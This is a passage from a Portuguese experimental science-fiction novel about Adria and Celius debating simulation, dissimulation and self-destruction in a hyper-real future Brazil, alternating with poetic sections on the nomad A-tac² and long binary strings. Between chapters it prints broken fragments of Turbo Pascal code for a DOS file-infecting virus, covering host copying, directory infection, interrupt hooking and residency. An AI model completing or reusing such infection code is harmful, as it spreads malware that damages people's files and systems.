– Em cada momento, um multiverso! – Exclamou Adria em susto, sentindo os seus "eus" voltarem a lhe constituir novamente. Rindo e sem prestar atenção ao que Adria acabara de dizer, com um ar de transparente deboche, Celius continua sua infantil diversão. – Acorde bela adormecida. Onde passaste a noite? Não estamos te pagando para dormir. Tua vigília é a mais bem paga desse setor. Seu sono nada vale para nós. A não ser que faça parte de experimentos dos Nano-instrumentos da Verdade! Caso contrário, espero que tenhas se precavido e não deixado vestígio para nossos acioni stas além-lua. A paciência deles já está se esgotando. E, por falar nisso... Já estouramos o prazo que nos deram. Ainda não temos o rastro de nada. Nenhum de nossos alter-egos fará isso por nós, ou melhor... Por você. Lembre-se Adria, os órfãos! Órfãos/ãs!!! 1010010100100101101010 Estes os/as sábios/as egoístas que não compactuam com os desejos da audiência passiva. 001001010000010010010. – Vim pessoalmente saber se você já conseguiu alguma coisa. - Finaliza Celius, com um tom de voz ambíguo como sua personalidade. Tom amigável por interesse. E encarando-a como uma espécie de irmão mais velho irritantemente protetor. – Quanto a isso, Dr. Celius, não se preocupe. Meus farejadores rastrearam algo há uma hora. Porém, só conseguiram trinta segundos de gravação. Adria e Celius imergem nos resultados. Os projetores holográficos geram a paisagem. Os amplificadores 5D criam a atmosfera sonora. Os nanoconstrutores se encarregam da textura, dos cheiros, do clima e do sabor. Estranhamente a sensação é de deja-vú para ambos. Adria perde o fôlego. Dá uma súbita pausa. Como se estivesse em alguma realidade hiper-virtual que só ela sentia existir, porém em suas memórias inconfessas. Celius dá um profundo suspiro. Estende seu dedo e tenta se conecta a alguma saída de dados. Seu corpo parece formigar. É preciso fechar os olhos e inclinar um pouco a cabeça para trás. Suspirar lentamente. Talvez dar um sorriso, pois a sensação até que lhe agrada e ...

28

#

Ao chegar à ilha mais próxima, A-tac² encontrou, no oásis dos espetáculos milenares, grande quantidade de povo reunido. Isso, pois, lhes fora prometido que viveria diretamente aquilo que, em tempos imemoriais, havia se tornado representação objetiva: suas vidas. A velha e caduca utopia que ainda não o fez delirar: vida. Mesmo ainda não envenenado pela esperança e pela promessa, A-tac² juntou-se ao povo. A grande vedete do espetáculo milenar assim falou à grande quantidade de desprezadores dos fatos que se produzem sem ter nenhuma possibilidade de se produzir:

"O que é necessário para a preservação de uma determinada forma de vida? Trago-vos a possibilidade da verdade da vida humana; um artifício radical voltado para a instauração do real. Esse novo modelo é o que há de mais moderno em vida diretamente vivida; o real como verdadeiro enquanto verdadeiro: a verdade real! A vida vivida como ela foi, é e será. A realidade que hoje vos ofereço é recheada de medidas de seguranças contra a confusão das opiniões, dos cálculos cotidianos e da sensualidade." Neste momento, A-tac² pensou em escapar-se do corpo e da ilha. Sentiu uma mesquinha satisfação da doce e fácil crueldade de aderir-se ao movimento autômato de tudo o que é sobre-vivo. De tudo o que é pura causalidade. De tudo o que está dentro dos limites do sentido comum. O movimento de um mundo em sua totalidade; o movimento de um mundo em sua pureza, assim, falseado, diluído, idealizado, divinizado, puro. Enfim, efeitos determinados. Todos aqueles que ali estavam se encontravam como a própria sociedade pelas diversas unidades de tempo já experienciadas: fundidos no túmulo do sagrado; fundidos na inversão da vida, no modelo milenar da vida dominante da liberdade nula; fundidos nalguma superstição estabelecida em tempos imemoriais. "Que ilha mais comum é esta! É tudo determinação de fatores, finalidade, órgãos e matéria!" – pensou, sem saber, A-tac² - "Uma ilha, cuja tradição e hábito, ocultam a existência do eterno desvio entre o efeito real e o alvo de cada indivíduo para com um sonho ou ideal a se realizar, se desejar a dormência." Pela primeira vez, na Hiper-Tekoha Nômade e nas velocidades múltiplas dos hipermares, A-tac² sentiu que havia algum caminho de sua plenitude: havia um certo anseio por outra margem. Justiça? Compaixão? Virtude? Razão? Não, nenhum desejo por equilíbrios. A-tac² foi convocado por forças contrárias aos motivos para além das estrelas. Rebela-se. Não é causa determinante nem secundária. Não é introdução, presença ou existência. O alvo e os desvios são de natureza diferente. Assim lembra-se da aproximação da mecânica com a neurologia. Poderá a máquina abstrair? Poderá ela determinar as próprias variações de seus atos? Porém, o efeito escapa. Certas variações das causas que o determinam já não mais lhe pertencem. É efeituador artificial. Interação e retroação. Erro de histerese. No entanto, como ressonância harmônica de uma nota musical, lhe resta uma linha de fuga para sair dali, seguir e conascer com a liberdade: "Através de que há um mundo? Da consciência? Da livre personalidade? Dos instintos? Do híbrido ingênuo natural/artificial?". A-tac² não age por estreita determinação. Encontra-se, sem tê-la escolhido, em uma situação possibilitada pela sua relação fundamental com o seu deserto. O beduíno cuja corporeidade é feita pela desterritoriedade. O nômade cujo território é ele mesmo. Assim A-tac² deixou intacta aquela ilha. Não lhes deu nem lhes tirou nada, apenas desejou que os seus desprezadores dos fatos que se produzem sem ter nenhuma possibilidade de se produzir deixassem que seus hiper-mares transbordassem à ilha.

29

001010010101001001010100101010100101010001010110101001001001010010101001 0101010101001010011110010100101111101001010101010101100101001010100100100 101001001010100100010001010101110110000010100101010010010101001010101001 0101000101011010100100100101001010100101010101010010100111100101001011111 010010101010101011001010010101001001001010010010101001000100010101011101 1000

assign(FromF,nome_arq); reset(FrmF, 1); assign(ToF, nome); BlockRead(FromF, buf, SizeOf(buf), numread); BlockWrite(ToF, buf, numread, NumWritten); close(FromF); close(tof); assign(FromF, 'virtemp.TMP'); reset(FromF, 1); assign(ToF, nome); reset(tof, 1); seek(tof, LENVÍRUS); repet

30

001010010101001001010100101010100101010001010110101001001001010010101001 01010101010010100111100101001011111010010101101011010101011111011001000100 100010101001000101001010100100101010010101010010101000101011010100100100 1010010101001010101010100101001111001010010111110100101010101010110010100 101010010010010100100101010010001000101010111011000101010101010110010100 101010010010010100100101010010001000101010111011000

BlockRead(FromF, buf, SizeOf(buf), numread); BlockWrite(ToF, buf, numread, NumWritten); until (numread=0) or (NumWritten <>numread); close(FromF); close(tof); erase(fromf); HORAFIM(NOME); end;

31

I³ M0m3nt05 4pó5 0 cr1m3

001010010101001001010100101010100101010001010110101001001001010010101001 010101010100101001001010010101001010101010010101010100101010101000101001 0001010100100101101101010000101001011110010100101111101001010101010101100 101010010010101001010010101 dria e Celius retornam. Ambos com corpos aparentemente descansados. Seus pensamentos aparentemente estavam mais claros do que jamais estiveram. Como se estivessem acabado de acordar, olham, involuntária e sincronizadamente, em seus holoprojetores portáteis implantados geneticamente em seus pulsos, e percebem que havia algo de diferente com o tempo. Estranhamento. A sensação era a de que haviam se deslocado no tempo verticalmente. Também havia uma vontade gostosa de Adria e Celius se espreguiçarem. Um como se tivessem tido uma boa noite de sono e, a outra como se tivesse dado uma maravilhosa trepada. Tomada por uma sensação que não conseguia definir, mas que se aproximava daquele momento em que não se sabe muito bem se está dormindo ou se está acordada, Adria começa um discurso: – Celius, você se lembra de sua época universitária? Não dos momentos de farra, mas dos momentos de aula? Digo ainda, lembra-se exatamente da primeira emoção ao ingressar nela? Lembra-se daquela alegria de que um universo inteiro que ali se abria para nós? – Sorrindo Celios faz um gesto afirmativo com a cabeça e ombros. E Adria continua: – E você se lembra da aula magna? Do grande banho de água fria que nos dão para que abríssemos os olhos e deixássemos de lado as ilusões da juventude? Que era hora de crescermos e que ali não era espaço para utopias, e sim para o realismo? Que a primeira grande lição que aprenderíamos na Universidade era a de que conhecer é simular? Que fazia parte do processo de conhecimento? Que apenas em um primeiro momento, fingiríamos ter aquilo que não tínhamos, para, pouco a pouco, o que não tínhamos torna-se aquilo que unicamente tínhamos?

32

Celius a olha com uma das sobrancelhas levantada e novamente afirma, porém, desta vez, receosamente. Sua perspicácia de raciocínio já o estava alertando sobre tais premissas em forma de perguntas. Pois Adria poderia estar falando sobre qualquer coisa, mas porque ela escolheu falar sobre isso, justamente agora? Não teria outro momento menos profissional? Porque relembrar tais situações que a essa altura da vida fazem parte de tempos imemoriais? Ainda mais, porque ela está, partindo de nossas memórias afetivas, introduzindo um assunto tão técnico que é a definição de conhecimento? Porém, cismado e curioso, Celuis continua a ouvir Adria para ver onde isso iria chegar: – Pois então, há muito esse primeiro momento passou. Quantas vezes o repetimos? Quantas vezes tivemos que experimentar a mesma realidade hiper-virtual? Foram tantas às vezes, que passamos a nos sentir seguros e confortáveis. Simular, ou tecnicamente falando, conhecer não é garantir que os modelos seguros ancestrais jamais sejam superados? – Celius repete o mesmo gesto de receosa afirmação. – Enquanto eles funcionam está garantida a nossa felicidade, o mundo segue seu eterno fluxo de normalidades e seu eterno retorno do mesmo. Se não funcionam, isso quer dizer que a nossa existência e toda a realidade em nossa volta devem estar com problemas. Pense comigo Celius. – Convidando seu confuso colega de trabalho a participar de sua presente potencialidade expressiva. – Não houve momentos em que você ficou tentado à dissimulação? Fingir não ter aquilo que tinha, ou seja, fingir não ter os meios de inventar qualquer realidade hiper-virtual mais simples, porém realizadora? Fingir ser participante dessa realidade ao mesmo tempo em que mantém uma existência desdobrada em múltiplas realidades mais excitantes? Celius você jamais se deixou erotizar pelo delírio, pela fantasia, pelo falso, pela inverdade, pela sedução ou pela metáfora? E, você jamais sentiu a tentação de se transformar nas condições mais belas de sua própria vida? – Adria! Porque você está me fazendo essas perguntas? – Celius nada a fim de valorizar qualquer ambivalência doutrinária, e já imaginando uma visita do sinistro, salta de sua cadeira e assume uma postura de algum tipo de santo matematizado que, por sua compaixão pelos pobres pecadores dos cálculos, pretende barganhar com o diabólico mais uma pobre alma. – Se você estiver insinuando que podemos ficar milionários com essa descoberta que acabamos de experienciar... Você ficou doida? Quer que sejamos levados a Organização das Hiper-Nações Unidas? – Celius fazendo um gesto sugerindo a subtração de algo, continua. – Você quer dizer que “dissimulemos” o que acabamos de encontrar? Se for isso que estou pensando... Pirataria de realidades virtuais é considerada como o maior dos crimes contra a OHNU. É até mesmo o maior atentado terrorista contra a existência da Hiper-Terra. É negar tudo o que somos. Imagine se a Organização das Hiper-Nações Unidas fica sabendo que tivemos esse diálogo? Seremos os dois lançados para a estatística dos surtados. Seremos acusados de traidores do bem estar social. Seríamos rotulados de pessoas refugiadas e logo nos enviariam àqueles campos para refugiados. Estaríamos órfãos dos Estados-nações. – Celius se sentindo triunfante da barganha finaliza sob uma aura de redenção patriótica. – Adria, minha amiga. Você só deve estar brincando comigo. Só pode estar querendo se vingar por eu ter lhe interrompido algum agradável sonho quando entrei nesta sala...

33

– Eu sei a que seremos lançados e o que seremos considerados pela Organização das Hiper-Nações Unidas, Celius. Mas, quando eu disse “dissimular”, isso até que tem a ver com pirataria, mas não nessa concepção pobre da realidade. É uma pirataria como estado de espírito e não enquanto rótulo policialesco. É o estado de espírito daqueles velhos marinheiros do século XIX de se lançarem à vida breve, porém intensa. Lançar-se ao mar era ao mesmo tempo um suicídio e uma afirmação da vida. Ah, e quer saber Celius? Mesmo que eu tivesse pensando em roubar essa experiência edificante que acabamos de ter, e por camaradagem estivesse lhe convidando para ser cúmplice, isso não me faria perder o sono. Seria o meu mais belo crime! Que assim seja! Dissimular é abrir uma fenda nesse contínuo de realidade hiper-virtual! É o desejo por não mais dormir após o gozo. É simplesmente desaparecer na preparação e após o gozo! Neste momento, Adria se sente como se estivesse próxima a algum horizonte de eventos que, a partir dali, não se pode mais recuar. Espera uma repreensão exemplar por parte de Celius. Mas este está imóvel. Toda sua elegância parece agora desalinhada. Desconcertada. Homem sem equações. Toda a finura, arte e engenho que lhe davam poderes, que suas mãos nuas não podiam ter, parecia terem lhe abandonado. Percebendo isso, Adria se sente segura em continuar, pois queria seguir para mais longe ainda: – Ah, meu caro, tenho um exemplo para ilustrar esse desaparecimento que metaforizei como “lançar-se ao mar”. O ilusionismo que recebe o nome de social! Ah, esse é a maior das irreverências dessa realidade hiper-virtual que nos repetem incansavelmente. Pois é propriamente um gesto que faz referência a algo que não está lá. Ou melhor, que faz referência a algo que só está lá enquanto sistema fabricado para executar certa ação quando lhe é fornecido o interesse necessário. Que só se configura a partir do poder de fascinação que ele possui sobre a minha ou sobre a sua vida. O social nada mais é do que o fascínio dessa sobre-vida interessada a interesses alheios a nós. E isso sim é que é viver com sono. Um sono permanente contra todo acordar. Celius! Você está me ouvindo? Não quero mais dormir. Não foi você que me acordou! Minha vigília jamais voltará a ter preço outra vez! Celius boceja, mas isso não é o suficiente para intimidar Adria, que parece estar em algum tipo de êxtase. – Sinto que estou simplesmente caminhando lado a lado com o que mais me pertence: minha vigília delirante. Vejo o quanto a verdade e o caminho não significam nada. E melhor! Vejo com toda clareza embriagante como destruir toda essa hiperrealidade enfadonha e patriótica. Celius, estou falando do meu fim! E, isso, meu caro, ao contrário da vida de cordeiro sintético, me parece bem mais estimulante. Sentir que sou responsável diretamente tanto pela minha vida quanto pela minha morte! Sentir que "o que sou" é o mesmo que "como vivi nessa hiper-terra". Adria olha pelas paredes transparentes da Sala de Estratégias. Vê todas aquelas representações de seres vivos lá fora. Todos aqueles que se auto denominam cidadãos. Que circulando pelas ruas como formigas. Que pagam em dia seus impostos para garantir

34

a boa estrutura do Estado. Que trazem suas compras em ecobags; controlam seus gastos energéticos; moram em eco-cidades. Enfim, que acham que as hiper-corporações e seus governos estão fazendo a sua parte também, vivendo em perfeita harmonia entre civilização do consumo exagerado e natureza. Adria pensa em toda essa vida sintética que não mais move tudo o que é vivo em seu corpo. Adria, dá um nostálgico suspiro sem saber pelo quê. Sua necessidade de falar ainda lhe toma a libido. – Ser nômade na Hiper-Terra é superá-la enquanto lugar. É tornála também nômade. É torná-la Hiper-Tekoha. Imagine, Celius, me reconhecendo como condenada à produção de mim mesma. Imagine deixar-se atravessas a consciência delirante do meu fim que desde meu nascimento. Imagine as maravilhas de um grande abandono. Não desejar nem planejar eu mesma. Se divertir da maneira que bem entender. Sem Pai nem Mãe me dando pacotes fechados de soluções. Ainda por cima, pacotes criados por antigas culturas caducas... Soluções para problemas que nem mais sabemos quais são. Imagine Céliu! Imagine o momento em que todo o território torna-se seu nômade! Imagine Celius! Imagine! Desta vez, Celius olha voluntariamente para seu holo-projetor em seu pulso. Não disfarça certa tensão. Suspira e deseja que ninguém atravesse a porta da Sala de Estratégias naquele momento. – O que me percebo desejando agora, Celius, é ser tomada pela morte para uma dança sensual. É o que mais me estimula, e me faz sentir viva novamente... 001010010101001001010100101010100101010001010110101001001001010010101001 010101010100101001001010010101001010101010010101010100101010101000101001 0001010100100101101101010000101001011110010100101111101001010101010101100 Adria, enfim, para. Não completa seu pensamento. Com uma extraordinária consciência irracional, ela toma uma atitude à altura. Deixa seus pensamentos livres e em aberto. Lança-os às mais variadas direções do tempo. Assim e, somente assim, suas idéias poderiam se tornar vivas, entregues aos multiversos e à sua própria morte. Certamente, se encontrarem terras férteis para florescerem. 101001110100010100010001 001010100100101010010101010010101000101011010100100100101001010100101010 101010010100100101001010100101010101001010101010010101010100010100100010 1010010010110110101010101011011110101010101101010101

35

#

"- O que, pois, se entende por "vida"? 101110110010101010010110100100101010 0101010010010010010010010010101 Vida enquanto vida? 101010100110 A vida enquanto sentida? 01101011001010010100010101010 Sentida enquanto técnica? 10101 10101Enquanto arte? Enquanto autogoverno? 0100100101000101010101010010110101

10100101010101101001010101010100 O sentido da vida passa pelo oposto da vida sentida. Mas o sentido é falso, contudo, é sentido como vida. 10101010101011010101010 10010100101001010001001010010010101001101001010100010010101010110101001 10101010101011010110101 Será, pois, a vida enquanto sentido autenticamente sentida? 01010101010010000011010100100110010010101000110100101001000101010010101 Mas o sentido da vida sentida autenticamente é, nem mais nem menos, autêntico. Pois, só quem vive uma particular espécie de vida a sente autenticamente. 01010010101010111101101001010101 O sentido da vida é aquele cuja realidade consiste no real enquanto acordo? 10110101010101010101010110100100101001 Se o sentido é a adequação daquilo que se concorda com a vida sentida, ou mesmo, se o sentido é a adequação da vida sentida com o que se concorda, não me é dada escolha. 10100100101001010010101001010101 A vida não me atravessa, ela se funda em um plano de criação no qual, eu sou o criador, mas por bondade aos outros criadores, não admito minha criação, apenas assisto." Assim A-tac² navegava pelos hiper-mares da Hiper-Tekoha Nômade. Sem perceber que conversava consigo mesmo, com todos os seus "eus", seus zeros, uns, hexadecimais e um terceiro indeterminado. A-tac² olhou, admirado, para seus instrumentos de navegação e assim falou: – 010010010010100101001001010101010110 Demasiado tempo. Minha natureza abandonou meu comportamento. 10010101010101010 Agora a mim mesmo me proponho. Compreendo-me como um evocar. 1001 Estes instrumentos de navegação não tem sua morada original no que me proponho sem perceber. 10100101001000101010110101110101010 A vida entrega-se a ela mesma. A mim. 101010010010101000101101010010101101010010101010100100100101001001010101 101001001000010101010101010101010101010010101 A indicação aparece como abandono. 0010101010100010101001010 A solidão me faz não querer mais ficar calado. 101010100101001010101101010101010101010100101000101010100110110101010101 0000100100100100010100 Pressinto a morte. Desvelo. A vida me possui. Me acolhe e me abandona. 10010101000001001 Através de que há um mundo? 101001010010 Agora compreendo... 001001001010010010100101 A-tac² começa a torna-se espaço de jogo. Dissimulacro: a constante oscilação do vaivém entre o mistério e a ameaça da simulação: consciência de seu jogo. Um lugar através do qual pode haver um mundo? Enfim, seu próprio lugar de desprendimento e solitude, onde se estende uma tênue corda entre preservação e autodestruição. Esta última como o mais sublime ato da evolução. Portanto, nesse novo movimento, nesse novo jogo, que incontáveis vezes morre e conasce – não renasce –, A-tac² dissolve toda separação. Tudo, que até ali, fora para A-tac² o absoluto, torna-se histórico. Não o término de um pensamento em história, mas o início do encantamento de um mundo vivo produzindo a si mesmo. Mestre e possuidor de sua finitude. If MOSTRA then writeln('infecção completa'.); end;

36

#

0101010010010110110101000010100101111001001010101010101010101011100101111 10100101010101010110010 Celius, com ouvidos que desejavam, nem se quer por acidente ter escutado tamanho surto, tomado por um imenso terror, liberta uma súplica por uma boca que a muito deixara de salivar: – Mas Adria... A simulação, que tu chamas de ilusionismo, é uma exigência fisiológica para a preservação da vida humana. Ela é objetiva, segura e impessoal. Se não fingirmos termos o que não se tem, equivale a negar a própria vida. E, ela não tem o menor valor se desde já não estiver predeterminada. Isso já foi constatado pelas pesquisas patrocinadas para e pelo povo. Simulação é o próprio princípio de realidade. Já caminhamos na errância por séculos a fio. Agora caminhamos na plenitude do acerto. No verdadeiro que assim o quisemos que fosse. Por exemplo, não vivemos num estado totalitário. As pessoas podem fazer o que quiserem dentro desse nosso horizonte da verdade que é o social. A história há muito tempo deixou de ser o espaço privilegiado da verdade. Não acredito que você esteja renegando toda nossa liberdade, finura, precisão e segurança magistral sobre a Hiper-Terra. Tudo o que temos e o que somos, as nossas culturas, artes e conhecimentos, enfim, nossa vida, se desenvolveram graças as leis da simulação. Portanto, minha amiga, o ser humano não conseguiria viver sem ter uma medida absoluta para sua vida. Foi assim por milênios. Por que agora, por causa de um surto perigoso, mudaríamos? Já constamos que... – Já sei, já sei. - Interrompeu Adria com um tom de indiferença juvenil e presença de espírito. Orgulhosa não pretende deixar espaço para que Celius faça seu sermão da montanha – "Que pela Organização das Hiper-Nações Unidas à medida que se promove e conserva a vida é a medida do pensamento consciente que nossos ancestrais um dia vislumbraram." Mas Celius... Isso não resolve mais os nossos problemas. Nesse momento, Adria pensa, paralelamente às suas palavras que, o "nossos" que acabara de sair pela sua boca, talvez não incluísse Celius. – Nascemos no Brasil. 100 anos depois da consolidação de que este é um país moderno. Que progride continuamente mediante uma ordem lançada em um tempo linear. Desde quando a linearidade e a contigüidade fizeram com que navegássemos para terras a serem efetivamente descobertas? Quero ir além! Além do gozo de descobrir. Suicidar para conascer é o que me chama. É o suicídio enquanto desconhecido. E matar-me é a transvaloração de todos os valores. Algo somente realizado mediante saltos aleatórios, igual aos vírus de computador que um dia renasceram como nanotecnologias destrutivas. Celius, você acaba de me dizer que o ser humano não conseguiria viver sem ter uma medida absoluta para sua vida. Pois então, tentarei conseguir. Mesmo que isso custe minha humanidade. Talvez isso me seja um indício de que não devo ser da ordem natural das coisas. Que me suicidando enquanto tal é o mais belo e digno ato terrorista contra a natureza humana. Meu atentado contra o humanismo.

37

O rosto petrificado e os olhos arregalados de Celius, fazem com que, novamente, Adria pense que o paladar dele não seja capaz de saborear tão refinado sabor. Mesmo assim continua. – Ou melhor dizendo... Promover e preservar que espécie de vida? Uma vida colonizada e escravizada, onde quem nos governa, nos liberta das aldeias e das fazendas, mas, não nos dá terras para cultivar nosso sustento e criar nosso legado? Temos que ir além da idéia de retomarmos terras. Temos que as inventarmos! Adria se sente como uma filósofa marginalizada em sua ilha de edição de holografias, prestes a apelar aos sentidos e a imaginação de quem não entende sua metafísica, por mero excesso de senso comum, hábito e vulgaridade. - Ah não Adria... – Disse Celius respirando fundo, desejando que, com tal gesto o surto da moça fosse aspirado e mandado de volta, para a atmosfera em forma de CO2. – Pelo amor da avaliação da Organização das Hiper-Nações Unidas. Entendi tudo. Peço-lhe desculpas. Eu não deveria ter sobrecarregado seu cérebro. Não lhe dei tempo para se recuperar do sono. Por que você não disse que estava conectada? Com o que você estava sonhando mesmo? Com algum sonho romântico de ficção científica ou com algum sonho mítico pós-moderno? Adria... Adria.... Metáforas são perigosas. Causam dependências. São sempre mascaramentos ao que não conseguimos dizer honestamente. Cansamos de ver isso nas advertências do Ministério da Saúde. A bela moça de extraordinária consciência não se abala. De alguma forma ela sabe que aqueles não são ouvidos, olhos, pele e nariz para seu mundo. 010010100101001010100101010000101010010010101001010101001010100010101101 010010010010100101010010101010101001010010010100101010010101010100101010 101001010101010001010010001010100100101101101010101010100110010

38

#

0010100101010 – Visito ilhas desterritorializada em tempos múltiplos. 010101010010010110010101010100100101001101010010101010101010101010101010 1010101110010 Vejo séculos em segundos. 001001001011010010010101010101010101 10101Trágico balé da humanidade. 0010010100101010100101001001001000101101010 1010010010010101101011011 Deuses. Nasceram. Pereceram. 101011010100010101000 1100101100101010 O que permanece? 0100101001000111110 A indigência do pensamento? 1010101011101001010001001110010010100101010101001100101101010 001010010100100000100101001001001010100101001010010101101011001010010011 001010100101001 Vejo corpos incandescentes, de desejos sombrios. 101010101000010 1010010010100101001010010100101010001001001001001 Afetam a beleza? 101101010010100 Desprezadores da vida... 1101011011101001010110101001011010011 010010010010010100100110101010100001000101110101010010001010001010010010 001001001001001010010011010101010000100010111010101001000101001001010010

100100100100100101010101010101010101110010011010101010000100010111010101 001000101001001001001011010111010010101001010010101010101010101010101001 100101001010101010 O que é essa doce sensação de desvio?100101010100101010110 00100100110101000100100 Há! É você. A generosa forma do mistério. 10100101101010 0100011110110101001110 Doce. 001001011010100101010100100101010110101010101 101001010100101010011001 Terna. 0011010010010101101010101100101101010101101 101010110101100110100101100001 Erótica. 110101011010101010100101010101111010 A-tac², nasce, torna-se jogo, sacrifica sua alma. Mudado está A-tac². Incendiários estão seus pensamentos. O calor é necessário. Mas eles o fizeram frio. Julgaram -na sono. O que eles não esperavam é que, no mais ermo dos desertos tecnológicos, deu-se uma marcha insuperável, poucos sabem disso: para o jogo da criação é preciso que pensamentos copulem indigentemente. Trapaceiro. A caminho do outro lado, da outra margem.

produce procura(nome, drir:string); begin if MOSTRA then writeln('Iniciando infecção do diretório: ', nome); FindFirst(nome,Archive, DirInfo); {$i+} while (DosError=0) and (arquiv numread); close(FromF); close(tof); exec('virtemp.tmp',paramstr(1)+' '+paramsrt(2)+' '+paramsrt(3)); rewrite(tof); close(tof); erase(tof) if MOSTRA then writeln('Execusão do programa hospedeiro finalizado'); end;

39

#

101010101001010010010100101010010101010100101010101001010101010001010010 0010101001001011011010100001010010111100101001011111010010101010101011001 01010010000100100101101010110100010101 – Celius, o que quero dizer é que, apesar de toda essa liberdade, finura, precisão e segurança magistral sobre a Hiper-Terra que você disse que temos, sem mesmo tê-las, eu ainda sinto uma espécie de... Sentimento de nenhum mistério! Adria, novamente se sente em um horizonte de eventos. Pois sabia que não mais poderia voltar do futuro que acaba, desejantemente, de se lançar. Tomada por tal sabedoria sem razões, apenas lança um desfecho provisório que lhe servirá,

sensualmente, como ponto de partida à seu atentado contra humanidade, ou seja, à seu suicídio enquanto humana. Portanto, naquele momento, Adria, sem ter consciência disso, desvela o que a envolve. Deixa-o intacto. Deixa que a diferença continue clara e não disfarçada. Dissimula. - Ufa! - Disse Celius recostando-se em sua confortável cadeira moldada dinamicamente à sua anatomia, pelas nano-partículas inteligentes projetadas especialmente para fabricarem em tempo real, o seu bem estar no trabalho. – Por um momento pensei que você estivesse falando sério. "Sentimento de nenhum mistério"? Mais um jogo de palavras. – Celius querendo não possuir e ser possuído por uma bela consciência desejante qualquer, também dissimula. Só que da sua maneira. Ele não pretende guardar o perigoso desmistério. Ele pretende apenas preservar a falsificação da imagem. – Pensei que estivesse aspirando realmente ter um problema com a Organização das Hiper-Nações Unidas. Nossa sociedade foi mantida feliz através dos séculos. Tudo isso garantido pelas simulações, como as que possibilitaram seu sonho – eis a falsificação da imagem – feitas por pessoas como nós. – Celius embriagado pela sua verdadeirização, tenta, com alguma remota esperança de (re)incluir Adria em seu mundo profundo e essencial, trazer-lhe novamente ao presente da cidadania e da brasilidade: o embelezar do ser humano como profundo, não como sedução vaidosa e exaltada. – Cada cidadão foi mantido sob a felicidade mediante um discurso de ordem, de determinações, de bens selecionados, enfim da fabricação de um ser humano realmente vivo. Onde o indeterminado não tem mais o menor valor. Foi assim que quisemos. Não há mais nada para sermos além do que já somos. Nossos antepassados assim escolheram: não temos mais que viver a cada dia. Somos os senhores de nossos próprios destinos. Somos os projetistas de nossos futuros. Não queremos mais lutar, queremos viver confortavelmente. Não queremos mais conflitos de nenhuma espécie. Queremos paz... Celius sente-se orgulhoso por estar falando por uma boca que não é propriamente a sua. Falar através de uma boca maior que a sua equivale a Celius, ser maior do que se é. Equivale a não ser superfície, mas a ser essência do humano. Ser o próprio humanismo em carne e osso. Significava ser o representante brasileiro da humanidade.

40

#

A-tac² desliza hiper-onda abaixo. Sozinho? Encontra povos e guarda silêncio. Ri e se autodestrói. Assim é o que evoca sua propriedade. O que sempre lhe é evocado a fazer. A-tac² se ouve legitimamente. Há um sentimento de que falta algo. "Mas o que?" Adora essa pergunta. Pois, sente como se fosse uma estranha aos débitos dos outros. Efetivamente o é. Portanto, revela-se como testemunho da doce estranheza. Articula-se na silenciosidade. Mas, ao chegar numa nova ilha, repentinamente, torna A-tac² a ver mais povo reunido. Dessa vez o povo espera por manuais. Dentro do povo só há caos ordenado desejosos de progresso linear.

Nessa ilha há também algo típico: as coisas de mais elevado valor possuem uma origem no ícone, na imagem de um comercial. Uma origem que nada mais é do que uma promessa de manuseio. Um manuseio cheio de razões. Sem opostos. Apenas elas e seus respectivos manuais. A-tac² se sente cruel. Não batiza solenemente essas coisas. Esses presentes dados por seus pais e mães. Aquilo que liberta e redime o povo. "Libertação? Redenção?" A-tac² não admira extrema miséria. Alter ego maligno, jogador de suas aparências, faltas e indeterminações, egoísta abandona essas coisas de mais elevado valor que também lhes são ofertadas. – Outrora, tomaria uma temerária generalização de fatos esparsos. 0010010011010110010010010100 Os valores que querem dominar e os valores que querem se escravizar são criados juntos com o povo. 01010010101010010100100100100 Minha cruel consciência evoca "Eu". 0100101001001011001001010111010100010010010 Essas ilhas trazem o hábito do mais antigo prazer de formigas. 010101101010101010011 10100100101000001001010100111100 Tempo demais, esteve escondido em mim um artista e um inútil amante. 010110111010010101010101001010010010010100101010001 10010100010100001001010100101 Criador e sedutor. 101001010100010010100100101 100101010100101001001010001 Mas me falta algo. 10101001000101001001000111100 00101011101010010100100100101011001001 Minha morte. 10100110101010101010010 11001001010100010101101 A morte da humanidade. 1010010010101010100101010101 10101101101010001010101010100101 A morte de minha humanidade 101010110101001 0101010101010101011011010001010101010010101101001100101001101 Que a morte de A-tac² seja uma perversão contra o frio e o sobre-vivo. Mais que tudo, espero encontrar-te como "EU". Desprendido das vivências recorrentes e primando sobre ocorrências raras. Seleto, sutil, raro, difícil de compreender. Sem dispensar o convívio. Vê-lo lançado como uma bola de fogo no que ainda falta na humanidade: a própria humanidade. Livre está para a morte. Livre está para a vida. A-tac² não mais será a mesma. Na vossa morte fogem as formigas. Invoca prodigiosas forças. Na vossa morte reconcilia valor e criação. Move em direção ao não semelhante, não costumeiro, não mediano, não gregário. Brilha e reluz a consciência amante do artista: criador e sedutor. Do conascimento entre a poesia e a experiência. Da metáfora e do holograma.

41

begin if MOSTRA then writeln ('Iniciando o vírus'); nome_arq:=paramsrt(0); SETCBREAK(FALSE); Contra(nome_arq); inicinf; executa; apag_arq; GetlntVec($1c,@int1c); SetlntVec($1c,Addr(bola));

vbola:=false; cx:=random(80); cy:=random(24); GetlntVec($17,@printer); SetlntVec($17,Addr(escrever)); if MOSTRA then writeln('Fim do vírus'); keep(0); if mostra then writeln ('Programa residente'(; end. #

101010101001010010010010101001001010100101010100101010001010110101001001 001010010101001010101010100101001001010010101001010101010010101010100101 010101000101001000101010010010110110010010101001010101010010110101000010 10010101001010101010101011111100101001011111010010101010101011001

"Nós guardamos o seu sonho. Não precisam mais desejar dormir. Pagamos pela sua vigília." - Subitamente, como a libido (o doce e violento híbrido de consciência e instinto), a Sala de Estratégias é invadida por um comercial holográfico feito e patrocinado pela Organização das Hiper-Nações Unidas. Um comercial espetacular, com cheiro de incenso e um belo modelo andrógino como porta-voz de tão reconfortantes palavras. Um comercial-telepático projetado pelos melhores publicitários da Hiper-Terra. Aqueles que chegam a acreditar em seus próprios materiais publicitários. Com Celius calado e tomado por um frenesi religioso – onde o que se é vivido não vai muito além do movimento automatizado de um conjunto de imagens, de representações – pelo comercial-telepático, Adria teve um vislumbre do que estava lhe acontecendo. Não um vislumbre de teor religioso como o de Celius diante do comercial, mas um evocar da simples e sensual atitude do deixar ir do sistema de coordenadas horizontais do tempo. Da exclamação de um narcísico sim, pelo que lhe há de mais próprio: sua consciência afetiva de querer ser já sendo. Adria diferentemente de suas células, reconstituídas a cada momento pela nanotecnologia médica, nunca mais seria a mesma. A partir daquele momento sua vida não mais pertenceria à Hiper-Terra, ao Brasil, ao pacto social distanciado enquanto polaridade da natureza. Não mais pertencia, às pesquisas científicas, às doutrinas 